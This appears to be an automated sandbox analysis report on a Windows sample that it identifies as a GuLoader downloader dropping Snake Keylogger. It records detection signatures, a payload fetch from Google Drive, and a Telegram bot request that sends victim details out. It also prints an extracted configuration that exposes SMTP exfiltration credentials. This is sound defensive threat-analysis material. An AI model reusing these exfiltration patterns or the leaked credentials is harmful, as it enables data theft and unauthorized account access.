Windows Analysis Report
NDQ211216GM08.exe.bin.exe

Overview

General Information

Sample name: NDQ211216GM08.exe.bin.exe
Analysis ID: 1637274
MD5: cfdb222e894ea0d5fe9557aae2e0adf3
SHA1: cc01954d759cce12e827be5b1443d5702ebc779d
SHA256: d7798f6bb9a86bb1f5c9d5633015951425439cad729cc2411ff092ae654620be
Tags: exeuser-TornadoAV_dev
Infos:

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: NDQ211216GM08.exe.bin.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Avira: detection malicious, Label: TR/Injector.wdfal
Found malware configuration
Source: 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "vicente@bodegasvicenteribera.es", "Password": "Vic123456**", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Virustotal: Detection: 63% Perma Link
Multi AV Scanner detection for submitted file
Source: NDQ211216GM08.exe.bin.exe Virustotal: Detection: 63% Perma Link
Source: NDQ211216GM08.exe.bin.exe ReversingLabs: Detection: 63%
Joe Sandbox ML detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234187A8 CryptUnprotectData, 11_2_234187A8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_23418EF1 CryptUnprotectData, 11_2_23418EF1
Uses 32bit PE files
Source: NDQ211216GM08.exe.bin.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.9:49696 version: TLS 1.0
Source: unknown HTTPS traffic detected: 142.250.74.206:443 -> 192.168.2.9:49693 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.9:49694 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49713 version: TLS 1.2
Source: NDQ211216GM08.exe.bin.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Code function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405C13
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Code function: 0_2_0040683D FindFirstFileW,FindClose, 0_2_0040683D
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_0040290B FindFirstFileW, 11_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 11_2_00405C13
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_0040683D FindFirstFileW,FindClose, 11_2_0040683D
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 0015F45Dh 11_2_0015F2C0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 0015F45Dh 11_2_0015F4AC
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 0015FC19h 11_2_0015F974
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 22413308h 11_2_22412EF0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 22412D41h 11_2_22412A90
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2241EA79h 11_2_2241E7D0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2241D919h 11_2_2241D670
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2241D4C1h 11_2_2241D218
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 22413308h 11_2_22413236
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2241DD71h 11_2_2241DAC8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 22413308h 11_2_22412EEA
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2241E621h 11_2_2241E378
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2241E1C9h 11_2_2241DF20
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 22410D0Dh 11_2_22410B30
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 224116F8h 11_2_22410B30
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 11_2_22410040
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2241EED1h 11_2_2241EC28
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2241F781h 11_2_2241F4D8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2241F329h 11_2_2241F080
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2241FBD9h 11_2_2241F930
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2241D069h 11_2_2241CDC0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23417EB5h 11_2_23417B78
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23419280h 11_2_23418FB0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341DEFFh 11_2_2341DC30
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23415179h 11_2_23414ED0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23410FF1h 11_2_23410D48
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341E81Fh 11_2_2341E550
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23412A01h 11_2_23412758
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341C82Fh 11_2_2341C560
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341A83Fh 11_2_2341A570
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234125A9h 11_2_23412300
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341F5CFh 11_2_2341F300
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341D5DFh 11_2_2341D310
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234179C9h 11_2_23417720
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341B5EFh 11_2_2341B320
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234155D1h 11_2_23415328
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23419A8Fh 11_2_234197C0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23415E81h 11_2_23415BD8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341ECAFh 11_2_2341E9E0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341CCBFh 11_2_2341C9F0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234118A1h 11_2_234115F8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23415A29h 11_2_23415780
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341FA5Fh 11_2_2341F790
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341DA6Fh 11_2_2341D7A0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23411449h 11_2_234111A0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341BA7Fh 11_2_2341B7B0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23412E59h 11_2_23412BB0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234102E9h 11_2_23410040
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341BF0Fh 11_2_2341BC40
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23411CF9h 11_2_23411A50
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23419F1Fh 11_2_23419C50
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23413709h 11_2_23413460
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23417119h 11_2_23416E70
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341F13Fh 11_2_2341EE70
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23414D21h 11_2_23414A78
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341ACCFh 11_2_2341AA00
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234132B1h 11_2_23413008
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23416CC1h 11_2_23416A18
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234148C9h 11_2_23414620
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234162D9h 11_2_23416030
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341E38Fh 11_2_2341E0C0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23417571h 11_2_234172C8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341C39Fh 11_2_2341C0D0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341A3AFh 11_2_2341A0E0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23410B99h 11_2_234108F0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341D14Fh 11_2_2341CE80
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23416733h 11_2_23416488
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341B15Fh 11_2_2341AE90
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23410741h 11_2_23410498
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23412151h 11_2_23411EA8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234847E8h 11_2_23484478
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23489B10h 11_2_23489818
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348F5E8h 11_2_2348F2F0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23484E90h 11_2_23484B98
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23481517h 11_2_23481248
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23486B40h 11_2_23486848
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234802E7h 11_2_23480040
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348D938h 11_2_2348D640
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23483E27h 11_2_23483B58
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348C150h 11_2_2348BE58
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23489648h 11_2_23489350
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23481E37h 11_2_23481B68
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23487E60h 11_2_23487B68
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23485358h 11_2_23485060
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348EC59h 11_2_2348E960
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348D470h 11_2_2348D178
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348A968h 11_2_2348A670
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348DE00h 11_2_2348DB08
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348B2F8h 11_2_2348B000
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23482BE7h 11_2_23482918
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23487008h 11_2_23486D10
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23480BF7h 11_2_23480928
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23485820h 11_2_23485528
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348F120h 11_2_2348EE28
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348C618h 11_2_2348C320
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23483507h 11_2_23483238
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348AE30h 11_2_2348AB38
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23488328h 11_2_23488030
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23483997h 11_2_234836C8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348B7C0h 11_2_2348B4C8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23488CB8h 11_2_234889C0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234819A7h 11_2_234816D8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234874D0h 11_2_234871D8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348E2C8h 11_2_2348DFD0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234842B7h 11_2_23483FE8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348CAE0h 11_2_2348C7E8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23489FD8h 11_2_23489CE0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234822C7h 11_2_23481FF8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234887F0h 11_2_234884F8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23485CE8h 11_2_234859F0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23482757h 11_2_23482488
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23489180h 11_2_23488E88
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23486678h 11_2_23486380
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23480767h 11_2_23480498
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348E790h 11_2_2348E498
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348BC88h 11_2_2348B990
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23483078h 11_2_23482DA8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348A4A0h 11_2_2348A1A8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23487998h 11_2_234876A0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23481087h 11_2_23480DB8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234861B0h 11_2_23485EB8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348FAB0h 11_2_2348F7B8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348CFA8h 11_2_2348CCB0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 11_2_234AF1CB
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 11_2_234AF1C7
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 11_2_234AF1BF
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 11_2_234AF1BD
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 11_2_234AF228
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234B0800h 11_2_234B0508
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234B0338h 11_2_234B0040
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 11_2_234E2A80

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.9:49713 -> 149.154.167.220:443
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2014/03/2025%20/%2011:48:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 193.122.130.0 193.122.130.0
Source: Joe Sandbox View IP Address: 104.21.80.1 104.21.80.1
Source: Joe Sandbox View IP Address: 104.21.80.1 104.21.80.1
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49699 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49695 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49698 -> 104.21.80.1:443
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49693 -> 142.250.74.206:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1i4eTgLwUk9hJ78wr8LAtfXWd1f7g1Q0D HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1i4eTgLwUk9hJ78wr8LAtfXWd1f7g1Q0D&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.9:49696 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1i4eTgLwUk9hJ78wr8LAtfXWd1f7g1Q0D HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1i4eTgLwUk9hJ78wr8LAtfXWd1f7g1Q0D&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
